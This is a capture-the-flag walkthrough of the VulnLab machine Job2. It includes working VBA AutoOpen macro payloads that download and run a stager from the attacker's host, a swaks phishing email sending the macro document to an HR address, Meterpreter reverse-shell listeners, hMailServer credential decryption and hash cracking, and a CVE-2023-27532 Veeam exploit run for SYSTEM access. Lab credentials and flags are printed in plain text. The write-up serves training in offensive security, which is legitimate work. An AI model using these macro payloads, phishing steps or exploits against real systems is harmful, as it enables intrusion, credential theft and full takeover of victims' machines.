POSTS

VULNLAB: Job2

Job2 is a hard-rated Windows machine that involves a macro phishing attack for initial foothold. The machine has hMailServer installed, which includes a configuration file containing encrypted credentials for the database connection. After extracting the password database, we decrypt the SQL Server Compact database file (SDF), allowing a compromised user who can use WinRM to the machine. The machine has a vulnerable version of Veeam Backup & Replication; the attacker executes a malicious executable under sqlserver.exe, which is running as SYSTEM to gain full access.

VULNLAB: Job2
2645 words · 13 min

Overview

  • Type Machines
  • OS Windows
  • Severity Hard
  • Creator xct
  • Release date 2023 May 10 (JST)

Enumeration

Start the instance via Discord, wait around 2 minutes for the machine to start all services and let’s go:

image

10.10.92.144

Nmap

$ nmap -sCV -Pn -p- --min-rate=1000 -T4 10.10.75.231
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-19 11:48 JST
Nmap scan report for 10.10.75.231
Host is up (0.26s latency).
Not shown: 65519 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 a3:94:77:ca:16:0e:ec:fb:23:86:67:c6:0a:e3:ca:7b (RSA)
|   256 0e:2a:31:70:94:99:5d:95:d4:f8:40:d5:b5:36:8e:88 (ECDSA)
|_  256 29:31:2a:c3:55:b2:f7:73:f2:d3:bd:bc:c5:c1:14:f0 (ED25519)
25/tcp    open  smtp          hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
111/tcp   open  rpcbind
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Not valid before: 2023-05-09T13:31:40
|_Not valid after:  2122-05-09T13:41:37
|_http-title: Not Found
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Microsoft-HTTPAPI/2.0
445/tcp   open  microsoft-ds?
2049/tcp  open  rpcbind
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-02-19T02:54:10+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=JOB2
| Not valid before: 2025-02-18T02:48:08
|_Not valid after:  2025-08-20T02:48:08
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6161/tcp  open  msrpc         Microsoft Windows RPC
6210/tcp  open  msrpc         Microsoft Windows RPC
6290/tcp  open  unknown
11731/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows
  • Seems a server (not a DC)
  • Main open ports are for SMB, WEB and also RDP. One non common port is SMTP
  • Add www.job2.vl, job2.vl in in /etc/hosts

SMB (445/tcp)

$ nxc smb www.job2.vl -u 'guest' -p '' --shares 
SMB         10.10.75.231    445    JOB2             [*] Windows Server 2022 Build 20348 x64 (name:JOB2) (domain:JOB2) (signing:False) (SMBv1:False)
SMB         10.10.75.231    445    JOB2             [-] JOB2\guest: STATUS_ACCOUNT_DISABLED 

Guest account is disabled

$ nxc smb www.job2.vl -u '' -p '' --shares  
SMB         10.10.75.231    445    JOB2             [*] Windows Server 2022 Build 20348 x64 (name:JOB2) (domain:JOB2) (signing:False) (SMBv1:False)
SMB         10.10.75.231    445    JOB2             [-] JOB2\: STATUS_ACCESS_DENIED 
SMB         10.10.75.231    445    JOB2             [-] IndexError: list index out of range
SMB         10.10.75.231    445    JOB2             [-] Error enumerating shares: Error occurs while reading from remote(104)

Anonymous enumeration is denied

WEB (80/tcp)

image

  • Ok seems the entry point should be related to the Mail service.
  • hr@job2.vl should be the contact email.
  • Maybe a crafted malicious Microsoft Word Document containing CV template including a Macro can be a potential attack vector.

Microsoft Word Document Macro RCE (Julian)

We will create a malicious LibreOffice documents with a .odt extension.

We have different way to do that, manually or using some tool like Metasploit framework.

Looking at SMTP, it seems as though the server seems to have open relay enabled:

$ telnet job2.vl 25
Trying 10.10.92.144...
Connected to job2.vl.
Escape character is '^]'.
220 JOB2 ESMTP
HELP
211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
QUIT
221 goodbye
Connection closed by foreign host.

We use Rust to create a stager with a MSF shellcode:

Install the requirement for our project:

$ sudo apt install rustup
$ rustup default stable
$ rustup target add x86_64-pc-windows-gnu 

Then compile our stager:

$ git clone https://github.com/0xdea/backdoo-rs.git
$ cd backdoo-rs
$ cargo build --release --target x86_64-pc-windows-gnu
$ cp target/x86_64-pc-windows-gnu/release/backdoo-rs.exe ../.
$ cd ..
Warning
  • Don’t use .docx as the file extension since it won’t allow for embedded macros.
  • Use .doc or .docm extension in compliant mode.
  • Use a CV template like below:

Screenshot 2025-02-19 at 11 42 03

  • Enable Developer Tools in the Ribbon Menu to gain access to macros.
  • Name our Macro AutoOpen() with Word 2016+
  • Select the Current Document as the place to store the Macro.
  • Insert a new module:

Screenshot 2025-02-19 at 11 39 55

  • Insert our payload below:
Sub AutoOpen()
    URLDownloadToFileA 0, "http://10.8.4.253/backdoo-rs.exe", "C:\Windows\system32\spool\drivers\color\backdoo-rs.exe", 0, 0
    WinExec "C:\Windows\system32\spool\drivers\color\backdoo-rs.exe 10.8.4.253:443", SHOW_HIDE
End Sub

OR

Sub AutoOpen()

  a = Shell("""curl"" ""10.8.4.253/backdoo-rs.exe"" ""-o"" ""C:\Windows\tasks\backdoo-rs.exe""", vbHide)
  b = Shell("C:\Windows\tasks\backdoo-rs.exe 10.8.4.253:443", vbHide)

End Sub

OR

Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
    ByVal pCaller As Long, _
    ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long

Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
    ByVal lpCmdLine As String, _
    ByVal uCmdShow As Long) As Long

Sub AutoOpen()
    URLDownloadToFileA 0, "http://10.8.4.253/backdoo-rs.exe", "C:\Windows\system32\spool\drivers\color\10.8.4.253/backdoo-rs.exe", 0, 0
    WinExec "C:\Windows\system32\spool\drivers\color\backdoo-rs.exe 10.8.4.253:443", SHOW_HIDE
End Sub
  • When using the 64 bit version of Microsoft Word, Declare VBA functions with “PtrSafe” to avoid compilation errors.
  • We declare two seperate functions before the macro AutoOpen().
  • The first one implements “URLDownloadToFileA” from urlmon.dll, which, as the name suggests, downloads a file from a remote host and saves it to a destination on the remote filesystem.
  • The second one executes the previously downloaded executable.

You could place anything there, like a C2 beacon or powershell script. Many VBA payloads and explanations can be found here:

Example:

Screenshot 2025-02-19 at 11 38 00

  • Save it:

Screenshot 2025-02-19 at 11 41 25

Set a local web server:

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Set a Meterpreter listener:

$ msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 443; set ExitOnSession false; exploit -j"

Send our phishing email:

$ swaks --to hr@job2.vl --from "candidate@pwned.com" --header "CV" --body "Impressive CV for a good new hire opportunity" --attach-type application/octet-stream --attach @Job2_CV1.doc --server job2.vl --port 25 --timeout 25s

OR in silence mode:

```sh
$ swaks --to hr@job2.vl --from "candidate@pwned.com" --header "CV" -S --body "Impressive CV for a good new hire opportunity" --attach-type application/octet-stream --attach Job2_CV1.doc --server job2.vl --port 25 --timeout 25s

After few minutes, our stager is downloaded:

10.10.75.231 - - [19/Feb/2025 19:24:56] "GET /backdoo-rs.exe HTTP/1.1" 200 -

Then we got a shell as Julian:

msf6 exploit(multi/handler) > [*] Sending stage (203846 bytes) to 10.10.75.231
[*] Meterpreter session 1 opened (10.8.4.253:443 -> 10.10.75.231:51930) at 2025-02-19 19:25:02 +0900

msf6 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information         Connection
  --  ----  ----                     -----------         ----------
  1         meterpreter x64/windows  JOB2\Julian @ JOB2  10.8.4.253:443 -> 10.10.75.231:51930 (10.10.75.231)

Privilege escalation

Escalate to Ferdinand (Job2_User)

Check for a flag:

meterpreter > ls c:\\users\\julian\\desktop\\
Listing: c:\users\julian\desktop\
=================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  2543  fil   2023-05-04 19:43:29 +0900  Word 2016.lnk
100444/r--r--r--  39    fil   2023-05-04 00:38:10 +0900  creds.txt
100666/rw-rw-rw-  282   fil   2023-05-04 01:28:26 +0900  desktop.ini

meterpreter > cat c:\\users\\julian\\desktop\\creds.txt
Mailserver Administrator: MailAdm1n2023

No flag but found Mailserver Administrator:MailAdm1n2023

Check for other user accounts:

meterpreter > ls c:\\users\\
Listing: c:\users\
==================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  8192  dir   2023-05-03 06:19:59 +0900  Administrator
040777/rwxrwxrwx  0     dir   2021-05-08 17:34:03 +0900  All Users
040555/r-xr-xr-x  8192  dir   2023-05-03 01:30:07 +0900  Default
040777/rwxrwxrwx  0     dir   2021-05-08 17:34:03 +0900  Default User
040777/rwxrwxrwx  8192  dir   2023-05-04 00:17:30 +0900  Ferdinand
040777/rwxrwxrwx  8192  dir   2023-05-04 01:28:26 +0900  Julian
040555/r-xr-xr-x  4096  dir   2021-09-16 00:12:21 +0900  Public
100666/rw-rw-rw-  174   fil   2021-05-08 17:18:31 +0900  desktop.ini

Found Ferdinand so maybe we can escalate to this user.

As we know that hMailServer is used then we check hMailServer.INI:

meterpreter > cd "C:\Program Files (x86)"
meterpreter > dir
Listing: C:\Program Files (x86)
===============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  0     dir   2023-04-12 12:24:57 +0900  AWS SDK for .NET
040777/rwxrwxrwx  4096  dir   2023-04-12 12:24:57 +0900  AWS Tools
040777/rwxrwxrwx  0     dir   2023-05-04 03:47:14 +0900  Common Files
040777/rwxrwxrwx  4096  dir   2021-12-15 13:19:46 +0900  Internet Explorer
040777/rwxrwxrwx  4096  dir   2023-05-03 23:05:02 +0900  LINQPad5
040777/rwxrwxrwx  0     dir   2023-05-03 22:43:58 +0900  MSBuild
040777/rwxrwxrwx  0     dir   2021-08-19 15:41:12 +0900  Microsoft
040777/rwxrwxrwx  4096  dir   2023-05-04 00:15:38 +0900  Microsoft Office
040777/rwxrwxrwx  0     dir   2023-05-03 06:20:00 +0900  Microsoft OneDrive
040777/rwxrwxrwx  4096  dir   2023-05-04 03:15:45 +0900  Microsoft SQL Server
040777/rwxrwxrwx  0     dir   2023-05-03 23:08:26 +0900  Microsoft SQL Server Compact Edition
040777/rwxrwxrwx  0     dir   2023-05-03 22:49:01 +0900  Microsoft Synchronization Services
040777/rwxrwxrwx  0     dir   2023-05-04 03:11:58 +0900  Microsoft Visual Studio 14.0
040777/rwxrwxrwx  0     dir   2023-05-04 03:15:54 +0900  Microsoft.NET
040777/rwxrwxrwx  0     dir   2023-05-03 22:43:58 +0900  Reference Assemblies
040777/rwxrwxrwx  0     dir   2023-05-04 03:47:42 +0900  Veeam
040777/rwxrwxrwx  0     dir   2021-05-08 18:35:34 +0900  Windows Defender
040777/rwxrwxrwx  0     dir   2023-03-15 15:46:55 +0900  Windows Mail
040777/rwxrwxrwx  4096  dir   2022-07-13 17:03:39 +0900  Windows Media Player
040777/rwxrwxrwx  0     dir   2021-05-08 18:35:34 +0900  Windows NT
040777/rwxrwxrwx  4096  dir   2022-02-10 09:28:44 +0900  Windows Photo Viewer
040777/rwxrwxrwx  0     dir   2021-05-08 17:34:49 +0900  Windows Sidebar
040777/rwxrwxrwx  0     dir   2021-05-08 17:34:49 +0900  WindowsPowerShell
100666/rw-rw-rw-  174   fil   2021-05-08 17:18:31 +0900  desktop.ini
040777/rwxrwxrwx  4096  dir   2023-05-03 22:48:57 +0900  hMailServer

meterpreter > cd hMailServer
meterpreter > cd Bin
meterpreter > ls
Listing: C:\Program Files (x86)\hMailServer\Bin
===============================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100777/rwxrwxrwx  587776   fil   2021-10-03 16:57:28 +0900  7za.exe
100777/rwxrwxrwx  36864    fil   2021-10-03 17:12:24 +0900  DBSetup.exe
100777/rwxrwxrwx  8192     fil   2021-10-03 17:12:26 +0900  DBSetupQuick.exe
100777/rwxrwxrwx  31232    fil   2021-10-03 17:12:26 +0900  DBUpdater.exe
100666/rw-rw-rw-  176128   fil   2021-10-03 17:12:22 +0900  Interop.hMailServer.dll
100666/rw-rw-rw-  250438   fil   2021-10-03 16:57:28 +0900  License.rtf
100666/rw-rw-rw-  26112    fil   2021-10-03 17:12:22 +0900  Shared.dll
100666/rw-rw-rw-  432      fil   2021-10-03 16:57:28 +0900  dh2048.pem
100777/rwxrwxrwx  496128   fil   2021-10-03 17:12:24 +0900  hMailAdmin.exe
100666/rw-rw-rw-  604      fil   2023-05-03 22:49:05 +0900  hMailServer.INI
100777/rwxrwxrwx  19456    fil   2021-10-03 17:12:18 +0900  hMailServer.Minidump.exe
100777/rwxrwxrwx  4636672  fil   2021-10-03 17:12:16 +0900  hMailServer.exe
100666/rw-rw-rw-  163976   fil   2021-10-03 17:09:12 +0900  hMailServer.tlb
100666/rw-rw-rw-  2111488  fil   2021-10-03 17:03:02 +0900  libcrypto-1_1.dll
100666/rw-rw-rw-  504320   fil   2021-10-03 17:03:02 +0900  libssl-1_1.dll
100666/rw-rw-rw-  455328   fil   2021-10-03 16:57:28 +0900  msvcp120.dll
100666/rw-rw-rw-  970912   fil   2021-10-03 16:57:28 +0900  msvcr120.dll
100666/rw-rw-rw-  8402     fil   2021-10-03 16:57:28 +0900  tlds.txt
100666/rw-rw-rw-  247984   fil   2021-10-03 16:57:28 +0900  vccorlib120.dll

meterpreter > cat hMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=8a53bc0c0c9733319e5ee28dedce038e
[Database]
Type=MSSQLCE
Username=
Password=4e9989caf04eaa5ef87fd1f853f08b62
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

Until now we found:

  • Mailserver Administrator:MailAdm1n2023
  • AdministratorPassword=8a53bc0c0c9733319e5ee28dedce038e
  • MSSQLCE with encrypted password=4e9989caf04eaa5ef87fd1f853f08b62

We can find also the internal Database hMailServer.sdf and download it:

meterpreter > cd C:\\'Program Files (x86)'\\hMailServer\\Database
meterpreter > pwd
C:\Program Files (x86)\hMailServer\Database
meterpreter > download hMailServer.sdf
[*] Downloading: hMailServer.sdf -> /home/user/Downloads/VULNLAB/JOB2/hMailServer.sdf
[*] Downloaded 660.00 KiB of 660.00 KiB (100.0%): hMailServer.sdf -> /home/user/Downloads/VULNLAB/JOB2/hMailServer.sdf
[*] Completed  : hMailServer.sdf -> /home/user/Downloads/VULNLAB/JOB2/hMailServer.sdf

After obtaining all the pieces we need we can finally get our hands on the password for the Database, using hm_decrypt:

hmailserver_password.exe dec "4e9989caf04eaa5ef87fd1f853f08b62"
95C02068FD5D

Now that we have the password we can use LINQPad5, which we could find installed on the box aswell to import the .sdf file and gain access to the Data.

Open and add a connection:

image

But we received the message:

image

To fix that we need to install the 32 bit and 64 bit of Microsoft SQL Server Compact 3.5 Service Pack 2 for Windows Desktop.

Then we can open it correctly:

image

image

Found a password hash 04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11 from another user called Ferdinand

We crack it using Hashcat:

$ hashcat -a 0 -m 1421 '04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
...
04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11:Franzi123!
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1421 (hMailServer)
Hash.Target......: 04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02...8baa11
...

Found Ferdinand:Franzi123!

Grab the Job2_User flag:

meterpreter > ls c:\\users\\ferdinand\\desktop\\
Listing: c:\users\ferdinand\desktop\
====================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  36    fil   2023-05-04 01:00:38 +0900  user.txt

meterpreter > cat c:\\users\\ferdinand\\desktop\\user.txt
VL{ce3867020404ba034cff2a083b79665f}meterpreter > 

CVE-2023-27532 (Job2_Root)

List the processes:

meterpreter > ps

Process List
============

 PID   PPID  Name                      Arch  Session  User         Path
 ---   ----  ----                      ----  -------  ----         ----
...
 2076  832   Veeam.Backup.CatalogDataService.exe
 3248  832   Veeam.Backup.Agent.ConfigurationService.exe
 3464  832   VeeamDeploymentSvc.exe
 3488  832   VeeamNFSSvc.exe
 3496  832   VeeamTransportSvc.exe
 3568  832   VeeamFilesysVssSvc.exe
 4292  3496  Veeam.Guest.Interaction.Proxy.exe
 4548  7352  Veeam.Backup.Manager.exe
 4652  7352  Veeam.Backup.ExternalInfrastructure.DbProvider.exe
 4704  7352  Veeam.Backup.WmiServer.exe
 4744  7352  Veeam.Backup.UIServer.exe
 5640  832   Veeam.Backup.BrokerService.exe
 6168  832   Veeam.Backup.CloudService.exe
 7352  832   Veeam.Backup.Service.exe
 7896  8508  backdoo-rs.exe            x64   1        JOB2\Julian  C:\Windows\Tasks\backdoo-rs.exe
 7900  832   Veeam.Backup.MountService.exe
... 

Found Veeam Backup & Replication services

We took the poc from that post https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/ then use https://github.com/sfewer-r7/CVE-2023-27532 and patched out the cred stuff.

Maybe the Credential reading could failed because of the veeam version but not sure.

To get it to compile we have to remove the language version definition from the sln and change the multiline strings into normal ones. On top of removing the cred leaking part because of missing definitions.

To be more faster, we clone the latest POC:

$ git clone https://github.com/Yeeb1/CVE-2023-27532-RCE-Only

We compile the solution with Visual Studio to obtain the necessary DLLs then we upload all DLL and our binary:

meterpreter > upload Veeam.Backup.Common.dll
[*] Uploading  : /home/user/Downloads/VULNLAB/JOB2/Veeam.Backup.Common.dll -> Veeam.Backup.Common.dll
[*] Uploaded 1.76 MiB of 1.76 MiB (100.0%): /home/user/Downloads/VULNLAB/JOB2/Veeam.Backup.Common.dll -> Veeam.Backup.Common.dll
[*] Completed  : /home/user/Downloads/VULNLAB/JOB2/Veeam.Backup.Common.dll -> Veeam.Backup.Common.dll
meterpreter > upload Veeam.Backup.Interaction.MountService.dll
[*] Uploading  : /home/user/Downloads/VULNLAB/JOB2/Veeam.Backup.Interaction.MountService.dll -> Veeam.Backup.Interaction.MountService.dll
[*] Uploaded 420.08 KiB of 420.08 KiB (100.0%): /home/user/Downloads/VULNLAB/JOB2/Veeam.Backup.Interaction.MountService.dll -> Veeam.Backup.Interaction.MountService.dll
[*] Completed  : /home/user/Downloads/VULNLAB/JOB2/Veeam.Backup.Interaction.MountService.dll -> Veeam.Backup.Interaction.MountService.dll
meterpreter > upload Veeam.Backup.Model.dll
[*] Uploading  : /home/user/Downloads/VULNLAB/JOB2/Veeam.Backup.Model.dll -> Veeam.Backup.Model.dll
[*] Uploaded 4.24 MiB of 4.24 MiB (100.0%): /home/user/Downloads/VULNLAB/JOB2/Veeam.Backup.Model.dll -> Veeam.Backup.Model.dll
[*] Completed  : /home/user/Downloads/VULNLAB/JOB2/Veeam.Backup.Model.dll -> Veeam.Backup.Model.dll
meterpreter > upload VeeamHax.exe
[*] Uploading  : /home/user/Downloads/VULNLAB/JOB2/VeeamHax.exe -> VeeamHax.exe
[*] Uploaded 7.00 KiB of 7.00 KiB (100.0%): /home/user/Downloads/VULNLAB/JOB2/VeeamHax.exe -> VeeamHax.exe
[*] Completed  : /home/user/Downloads/VULNLAB/JOB2/VeeamHax.exe -> VeeamHax.exe
meterpreter > dir
Listing: C:\Windows\tasks
=========================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100666/rw-rw-rw-  6        fil   2025-02-19 18:29:57 +0900  SA.DAT
100666/rw-rw-rw-  1841232  fil   2025-02-19 19:51:41 +0900  Veeam.Backup.Common.dll
100666/rw-rw-rw-  430160   fil   2025-02-19 19:51:58 +0900  Veeam.Backup.Interaction.MountService.dll
100666/rw-rw-rw-  4444240  fil   2025-02-19 19:52:20 +0900  Veeam.Backup.Model.dll
100777/rwxrwxrwx  7168     fil   2025-02-19 19:52:26 +0900  VeeamHax.exe
100777/rwxrwxrwx  306176   fil   2025-02-19 18:43:22 +0900  backdoo-rs.exe

Start another Meterpreter listener:

$ msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4321; set ExitOnSession false; exploit -j"

Then launch our exploit:

meterpreter > shell
Process 6584 created.
Channel 6 created.
Microsoft Windows [Version 10.0.20348.1668]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\tasks>.\VeeamHax.exe --target 127.0.0.1 --cmd "c:\windows\tasks\backdoo-rs.exe 10.8.4.253:4321"
.\VeeamHax.exe --target 127.0.0.1 --cmd "c:\windows\tasks\backdoo-rs.exe 10.8.4.253:4321"
Targeting 127.0.0.1:9401

Then got a shell as System and grab the Job2_Root flag:

[*] Sending stage (203846 bytes) to 10.10.75.231
[*] Meterpreter session 2 opened (10.8.4.253:4321 -> 10.10.75.231:53132) at 2025-02-19 20:02:46 +0900

msf6 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JOB2  10.8.4.253:4321 -> 10.10.75.231:53132 (10.10.75.231)

msf6 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...

meterpreter > type c:\\users\\administrator\\flagt.txt
[-] Unknown command: type. Run the help command for more details.
meterpreter > ls c:\\users\\administrator\\
Listing: c:\users\administrator\
================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
040555/r-xr-xr-x  0        dir   2023-05-03 04:22:13 +0900  3D Objects
040777/rwxrwxrwx  0        dir   2021-08-19 15:45:22 +0900  AppData
040777/rwxrwxrwx  0        dir   2023-05-03 01:31:09 +0900  Application Data
040555/r-xr-xr-x  0        dir   2023-05-03 04:22:13 +0900  Contacts
040777/rwxrwxrwx  0        dir   2023-05-03 01:31:09 +0900  Cookies
040555/r-xr-xr-x  4096     dir   2023-05-04 05:00:19 +0900  Desktop
040555/r-xr-xr-x  4096     dir   2023-05-04 00:35:29 +0900  Documents
040555/r-xr-xr-x  0        dir   2023-05-04 00:35:43 +0900  Downloads
040555/r-xr-xr-x  0        dir   2023-05-03 04:22:13 +0900  Favorites
040555/r-xr-xr-x  0        dir   2023-05-03 04:22:14 +0900  Links
040777/rwxrwxrwx  0        dir   2023-05-03 01:31:09 +0900  Local Settings
040555/r-xr-xr-x  0        dir   2023-05-03 04:22:13 +0900  Music
040777/rwxrwxrwx  0        dir   2023-05-03 01:31:09 +0900  My Documents
100666/rw-rw-rw-  3145728  fil   2023-05-09 22:49:45 +0900  NTUSER.DAT
100666/rw-rw-rw-  65536    fil   2023-05-03 01:31:27 +0900  NTUSER.DAT{cb2c9905-007c-11ec-b8ea-cc31a8606de8}.TM.blf
100666/rw-rw-rw-  524288   fil   2023-05-03 01:31:08 +0900  NTUSER.DAT{cb2c9905-007c-11ec-b8ea-cc31a8606de8}.TMContainer00000000000000000001.regt
                                                            rans-ms
100666/rw-rw-rw-  524288   fil   2023-05-03 01:31:08 +0900  NTUSER.DAT{cb2c9905-007c-11ec-b8ea-cc31a8606de8}.TMContainer00000000000000000002.regt
                                                            rans-ms
040777/rwxrwxrwx  0        dir   2023-05-03 01:31:09 +0900  NetHood
040555/r-xr-xr-x  0        dir   2023-05-03 06:20:00 +0900  OneDrive
040555/r-xr-xr-x  0        dir   2023-05-03 04:22:13 +0900  Pictures
040777/rwxrwxrwx  0        dir   2023-05-03 01:31:09 +0900  PrintHood
040777/rwxrwxrwx  0        dir   2023-05-03 01:31:09 +0900  Recent
040555/r-xr-xr-x  0        dir   2023-05-03 04:22:14 +0900  Saved Games
040555/r-xr-xr-x  0        dir   2023-05-03 04:22:14 +0900  Searches
040777/rwxrwxrwx  0        dir   2023-05-03 01:31:09 +0900  SendTo
040777/rwxrwxrwx  0        dir   2023-05-03 01:31:09 +0900  Start Menu
040777/rwxrwxrwx  0        dir   2023-05-03 01:31:09 +0900  Templates
040555/r-xr-xr-x  0        dir   2023-05-03 04:22:13 +0900  Videos
100666/rw-rw-rw-  655360   fil   2023-05-03 01:31:08 +0900  ntuser.dat.LOG1
100666/rw-rw-rw-  475136   fil   2023-05-03 01:31:08 +0900  ntuser.dat.LOG2
100666/rw-rw-rw-  20       fil   2021-08-19 15:45:22 +0900  ntuser.ini

meterpreter > ls c:\\users\\administrator\\desktop
Listing: c:\users\administrator\desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  1029  fil   2023-05-03 23:04:58 +0900  LINQPad 5.lnk
100666/rw-rw-rw-  282   fil   2023-05-03 04:22:13 +0900  desktop.ini
100666/rw-rw-rw-  36    fil   2023-05-04 01:00:57 +0900  root.txt

meterpreter > cat c:\\users\\administrator\\desktop\\root.txt
VL{62ef35ebdc30b7e9c78d5a4d99f282b7}

Extra

Challenge solved! Use this link to share it: https://api.vulnlab.com/api/v1/share?id=0b3fe6c8-92fd-4ab5-9044-0bf31175ae49

job2